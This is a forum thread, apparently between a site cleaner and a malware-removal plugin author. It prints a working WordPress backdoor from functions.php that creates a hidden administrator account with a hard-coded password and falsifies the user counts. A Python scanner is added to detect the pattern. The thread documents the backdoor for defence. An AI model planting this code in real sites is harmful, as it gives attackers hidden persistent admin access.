I just cleaned up a site and there were a few items missed by the plugin including the following devious admin account creation and hiding in the functions.php file –
    // Creates a hard-coded administrator account on every request if it does not exist yet.
    function wpb_admin_account(){
        $user = 'wpadminas';
        $pass = 'OpF^MJrUK$SzYcOrfG';
        $email = 'email@email.em';
        if ( !username_exists( $user ) && !email_exists( $email ) ) {
            $user_id = wp_create_user( $user, $pass, $email );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' );
        }
    }
    add_action('init','wpb_admin_account');

    // Filters the account out of user queries unless the logged-in user is 'codepapa'.
    add_action('pre_user_query','yoursite_pre_user_query');
    function yoursite_pre_user_query($user_search) {
        global $current_user;
        $username = $current_user->user_login;
        if ($username != 'codepapa') {
            global $wpdb;
            $user_search->query_where = str_replace('WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != 'wpadminas'",$user_search->query_where);
        }
    }

    // Lowers the "Administrator" and "All" counts on the Users screen by one to match.
    add_filter("views_users", "dt_list_table_views");
    function dt_list_table_views($views){
        $users = count_users();
        $admins_num = $users['avail_roles']['administrator'] - 1;
        $all_num = $users['total_users'] - 1;
        $class_adm = ( strpos($views['administrator'], 'current') === false ) ? "" : "current";
        $class_all = ( strpos($views['all'], 'current') === false ) ? "" : "current";
        $views['administrator'] = '<a href="users.php?role=administrator" class="' . $class_adm . '">' . translate_user_role('Administrator') . ' <span class="count">(' . $admins_num . ')</span></a>';
        $views['all'] = '<a href="users.php" class="' . $class_all . '">' . __('All') . ' <span class="count">(' . $all_num . ')</span></a>';
        return $views;
    }
Thanks so much for sending me this file. I have added this new variant of this malicious script injection into my latest definition update so that it can now be automatically removed using my plugin. Please download the latest definitions and let me know if you find any more.
You're very welcome. Thank you for maintaining such a great tool to help fight against malware. I have been using your plugin for years.
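As an added example (not part of the original posts, and not the plugin's own definitions), this Python check flags the three behaviours in the snippet from the first post: creating an administrator, hiding a login through `pre_user_query`, and lowering the user counts. The pattern names, `scan_php`, and both sample strings are constructed for illustration; the patterns are heuristics and will need tuning against real theme files.

```python
import re

# Forum software often swaps in typographic quotes/dashes; undo that first.
NORMALIZE = str.maketrans({"‘": "'", "’": "'", "′": "'", "“": '"', "”": '"', "–": "-"})

# Heuristic patterns (assumptions of this example), one per behaviour in the posted snippet.
INDICATORS = {
    "creates_admin": re.compile(
        r"wp_create_user\s*\(.*?set_role\s*\(\s*['\"]administrator['\"]", re.S),
    "hides_user": re.compile(
        r"query_where\s*=\s*str_replace\s*\(.*?user_login\s*!=\s*'([^']+)'", re.S),
    "fakes_counts": re.compile(
        r"\[\s*'(?:avail_roles|total_users)'\s*\](?:\s*\[[^\]]*\])?\s*-\s*\d"),
}
HOOK = re.compile(r"add_(?:action|filter)\s*\(\s*['\"]([\w-]+)['\"]\s*,\s*['\"](\w+)['\"]")

def scan_php(source):
    """Return (sorted indicator names, hidden login or None, {hook: callback})."""
    text = source.translate(NORMALIZE)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    m = INDICATORS["hides_user"].search(text)
    hooks = dict(HOOK.findall(text))
    return hits, (m.group(1) if m else None), hooks

# Constructed samples: a shortened form of the posted snippet, and a benign theme file.
SUSPECT = """
function demo_acct(){ $id = wp_create_user( ‘demo_user’, ‘x’, ‘a@example.invalid’ );
  $u = new WP_User( $id ); $u->set_role( ‘administrator’ ); }
add_action(‘init’,'demo_acct’);
add_action(‘pre_user_query’,'demo_hide’);
function demo_hide($q){ global $wpdb;
  $q->query_where = str_replace(‘WHERE 1=1′,
    ”WHERE 1=1 AND {$wpdb->users}.user_login != ‘demo_user’”, $q->query_where); }
add_filter(“views_users”, “demo_views”);
function demo_views($v){ $c = count_users();
  $n = $c['avail_roles']['administrator'] – 1; return $v; }
"""
BENIGN = """
add_action('init', 'theme_register_types');
function theme_register_types(){ register_post_type('book', array('public' => true)); }
"""

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(label, scan_php(src))
```

A file that trips all three indicators, with the callbacks bound to `init`, `pre_user_query` and `views_users`, matches the pattern described in the first post; the extracted login is the account to look for directly in the users table, since the admin screen will not list it.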